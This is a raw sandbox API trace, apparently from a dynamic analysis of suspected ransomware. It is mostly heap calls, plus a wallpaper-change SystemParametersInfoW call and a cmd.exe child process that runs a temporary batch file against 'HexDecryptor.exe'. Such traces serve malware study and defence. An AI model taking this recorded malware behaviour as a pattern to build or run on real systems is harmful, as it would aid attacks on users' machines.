lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0300.268] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0300.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0300.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0300.269] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0300.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0300.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0300.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0300.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0300.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0300.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0300.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0300.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0300.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0300.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0300.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0300.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0300.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0300.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0300.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0300.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0300.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0300.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0300.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0300.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0300.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0300.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0300.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0300.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0300.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0300.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0300.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0300.275] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0300.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b68 [0300.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b68, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0300.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0300.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0300.276] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0300.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0300.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0300.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0300.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0300.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0300.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0300.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0300.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0300.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0300.277] SystemParametersInfoW (uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0) Thread: id = 48 os_tid = 0xa6c Thread: id = 50 os_tid = 0x710 Thread: id = 53 os_tid = 0x134 Thread: id = 54 os_tid = 0xee4 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x93b5000" os_pid = "0x84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xcf8" cmd_line = "\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 51 os_tid = 0xbdc [0121.285] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67b8d0000 [0121.285] __set_app_type (_Type=0x1) [0121.285] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67b8e6d00) returned 0x0 [0121.285] __getmainargs (in: _Argc=0x7ff67b909200, _Argv=0x7ff67b909208, _Env=0x7ff67b909210, _DoWildCard=0, _StartInfo=0x7ff67b90921c | out: _Argc=0x7ff67b909200, _Argv=0x7ff67b909208, _Env=0x7ff67b909210) returned 0 [0121.285] _onexit (_Func=0x7ff67b8e7fd0) returned 0x7ff67b8e7fd0 [0121.285] _onexit (_Func=0x7ff67b8e7fe0) returned 0x7ff67b8e7fe0 [0121.285] _onexit (_Func=0x7ff67b8e7ff0) returned 0x7ff67b8e7ff0 [0121.286] _onexit (_Func=0x7ff67b8e8000) returned 0x7ff67b8e8000 [0121.286] _onexit (_Func=0x7ff67b8e8010) returned 0x7ff67b8e8010 [0121.286] _onexit (_Func=0x7ff67b8e8020) returned 0x7ff67b8e8020 [0121.286] GetCurrentThreadId () returned 0xbdc [0121.286] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x7c [0121.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0121.287] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0121.287] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.478] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x9fd6d1fc98 | out: phkResult=0x9fd6d1fc98*=0x0) returned 0x2 [0121.479] VirtualQuery (in: lpAddress=0x9fd6d1fc84, lpBuffer=0x9fd6d1fc00, dwLength=0x30 | out: lpBuffer=0x9fd6d1fc00*(BaseAddress=0x9fd6d1f000, AllocationBase=0x9fd6c20000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.479] VirtualQuery (in: lpAddress=0x9fd6c20000, lpBuffer=0x9fd6d1fc00, dwLength=0x30 | out: lpBuffer=0x9fd6d1fc00*(BaseAddress=0x9fd6c20000, AllocationBase=0x9fd6c20000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.479] VirtualQuery (in: lpAddress=0x9fd6c21000, lpBuffer=0x9fd6d1fc00, dwLength=0x30 | out: lpBuffer=0x9fd6d1fc00*(BaseAddress=0x9fd6c21000, AllocationBase=0x9fd6c20000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.479] VirtualQuery (in: lpAddress=0x9fd6c24000, lpBuffer=0x9fd6d1fc00, dwLength=0x30 | out: lpBuffer=0x9fd6d1fc00*(BaseAddress=0x9fd6c24000, AllocationBase=0x9fd6c20000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0121.479] VirtualQuery (in: lpAddress=0x9fd6d20000, lpBuffer=0x9fd6d1fc00, dwLength=0x30 | out: lpBuffer=0x9fd6d1fc00*(BaseAddress=0x9fd6d20000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffff9302, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0121.479] GetConsoleOutputCP () returned 0x1b5 [0121.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0121.654] SetConsoleCtrlHandler (HandlerRoutine=0x7ff67b8f8150, Add=1) returned 1 [0121.654] _get_osfhandle (_FileHandle=1) returned 0xc [0121.654] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc04 | out: lpMode=0x7ff67b90fc04) returned 1 [0121.787] _get_osfhandle (_FileHandle=0) returned 0x8 [0121.787] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc00 | out: lpMode=0x7ff67b90fc00) returned 1 [0121.865] _get_osfhandle (_FileHandle=1) returned 0xc [0121.865] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x0) returned 1 [0121.937] _get_osfhandle (_FileHandle=1) returned 0xc [0121.939] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0122.120] _get_osfhandle (_FileHandle=1) returned 0xc [0122.120] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0123.464] _get_osfhandle (_FileHandle=0) returned 0x8 [0123.466] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0124.053] _get_osfhandle (_FileHandle=0) returned 0x8 [0124.053] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1e7) returned 1 [0124.158] GetEnvironmentStringsW () returned 0x27eb56d6030* [0124.158] GetProcessHeap () returned 0x27eb56d0000 [0124.158] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xec2) returned 0x27eb56d6f00 [0124.159] FreeEnvironmentStringsA (penv="=") returned 1 [0124.159] GetProcessHeap () returned 0x27eb56d0000 [0124.159] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x8) returned 0x27eb56d4270 [0124.159] GetEnvironmentStringsW () returned 0x27eb56d6030* [0124.159] GetProcessHeap () returned 0x27eb56d0000 [0124.159] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xec2) returned 0x27eb56d7dd0 [0124.159] 